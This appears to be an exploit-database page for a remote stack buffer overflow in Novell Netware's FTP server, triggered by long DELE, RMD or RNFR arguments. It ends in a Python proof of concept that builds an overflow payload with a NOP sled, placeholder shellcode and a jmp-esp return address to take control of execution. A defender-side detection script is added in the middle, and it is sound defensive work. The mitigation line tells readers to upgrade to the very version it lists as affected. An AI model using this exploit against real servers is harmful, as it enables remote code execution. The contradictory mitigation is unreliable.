Vendor: Netware NWFTPD.NLM
By: shahin [at] abysssec.com , info [at] abysssec.com
CVSS: 9 (CRITICAL)
Type: Buffer Overflow
CWE: 120
Product Name: Netware NWFTPD.NLM
Affected Version From: NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
Affected Version To: NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
Patch Exists: Unknown
Related CWE: Unknown
CPE: Novell:Netware:NWFTPD.NLM
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Unknown

Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow

A buffer overflow vulnerability exists in Novell Netware NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8). A remote attacker can send a specially crafted DELE command with an overly long argument to trigger a stack-based buffer overflow and execute arbitrary code on the target system.

Mitigation:

Upgrade to the latest version of Novell Netware NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
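
A defender-side check for the condition described above, added here as an example and not part of the original advisory or the exploit author's code: it flags RMD/RNFR/DELE lines in a captured FTP control stream whose argument is over-long or carries non-printable bytes. The 255-byte limit, the function names and the sample traffic are assumptions constructed for illustration.

```python
import re

# Commands the advisory title names as sharing the vulnerable argument parser.
AFFECTED = {b"RMD", b"RNFR", b"DELE"}
# Assumption: the page does not state the vulnerable buffer size, so this is a
# conservative ceiling for a legitimate path argument, not a measured bound.
MAX_ARG_LEN = 255

def inspect_ftp_line(line: bytes, max_len: int = MAX_ARG_LEN):
    """Return the reasons a control-channel line is suspicious, or []."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    if verb.upper() not in AFFECTED:  # FTP verbs are case-insensitive
        return []
    reasons = []
    if len(arg) > max_len:
        reasons.append("argument length %d exceeds %d" % (len(arg), max_len))
    # Path names are normally printable ASCII; bytes outside 0x20-0x7e point to
    # binary data in the argument. UTF-8 file names also trip this, so tune it.
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if nonprint:
        reasons.append("%d non-printable bytes in argument" % nonprint)
    return reasons

def scan_stream(data: bytes, max_len: int = MAX_ARG_LEN):
    """Split a client-to-server byte stream into lines and collect alerts."""
    alerts = []
    for n, line in enumerate(data.split(b"\n"), 1):
        reasons = inspect_ftp_line(line, max_len)
        if reasons:
            verb = line.split(b" ", 1)[0].decode("ascii", "replace")
            alerts.append((n, verb.upper(), reasons))
    return alerts

# Constructed sample traffic, not captured from a real server.
SAMPLE = (
    b"USER anonymous\r\n"
    b"PASS a@a\r\n"
    b"DELE /pub/old-report.txt\r\n"
    b"dele /" + b"A" * 654 + b"\r\n"
    b"RNFR /tmp/\x90\x90\x90\x90\r\n"
    b"STOR " + b"B" * 400 + b"\r\n"
)

if __name__ == "__main__":
    for lineno, verb, reasons in scan_stream(SAMPLE):
        print(lineno, verb, "; ".join(reasons))
```

The same two conditions can be expressed as an IDS rule or an FTP proxy filter in front of a server that cannot be patched.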

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <  Day 7 - (Binary Analysis)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

 http://www.exploit-db.com/moaub-7-novell-netware-nwftpd-rmdrnfrdele-argument-parsing-buffer-overflow/
'''

'''
  Title            :  Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow
  Version          :  NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
  Analysis         :  http://www.abysssec.com
  Vendor           :  http://www.Novell.com
  Impact           :  Critical
  Contact          :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter          :  @abysssec
'''
from ftplib import FTP
import sys

try:
	netwareServerIp = '127.0.0.1'
	ftp = FTP(netwareServerIp) 				
	ftp.login('anonymous','a@a') 
	buffer = "/"
	buffer += "\x90"*107  				#nops
	buffer += "\xcc"*413				#shellcode part2 = 413 byte
	buffer += "\xb9\xa4\xe0\x91"			#EIP - jmp esp from nwftpd.nlm module
	buffer += "\xcc"*124				#shellcode part1 = 124 byte
	buffer += "\x08\xeb\x90\x90\x90\x90" 		#short jmp to shellcode part2 
	ftp.voidcmd('DELE ' + buffer) 
	
except Exception,err:
	print err